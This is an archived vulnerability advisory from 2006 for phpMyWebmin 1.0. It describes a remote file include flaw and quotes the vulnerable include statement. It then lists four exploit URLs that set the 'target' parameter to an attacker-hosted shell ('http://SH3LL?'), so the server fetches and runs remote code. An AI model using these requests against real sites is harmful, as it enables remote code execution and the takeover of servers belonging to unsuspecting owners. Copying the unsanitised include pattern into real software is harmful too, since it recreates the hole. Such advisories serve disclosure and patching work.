TUCoPS :: Web :: PHP :: b06-5009.htm

phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
phpMyWebmin 1.0 <= (target) Remote File Include Vulnerability=0D
=0D
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
Discovered by XORON(turkish hacker)=0D
=0D
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
URL: http://www.josh.ch/joshch/joshch/_content_data/phpmywebmin/phpMyWebmin10.zip=0D 
=0D
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
Vuln. Code: include("$target/$folder/preferences.php");=0D
=0D
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
Exploit: /change_preferences2.php?target=http://SH3LL?=0D 
/create_file.php?target=http://SH3LL?=0D 
/upload_local.php?target=http://SH3LL?=0D 
/upload_multi.php?target=http://SH3LL?=0D 
=0D
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
Thanx: str0ke, Preddy, Ironfist, Stansar, Kernel-32 ;)=0D
=0D
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==0D
=0D
# milw0rm.com [2006-09-30]=0D
=0D

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH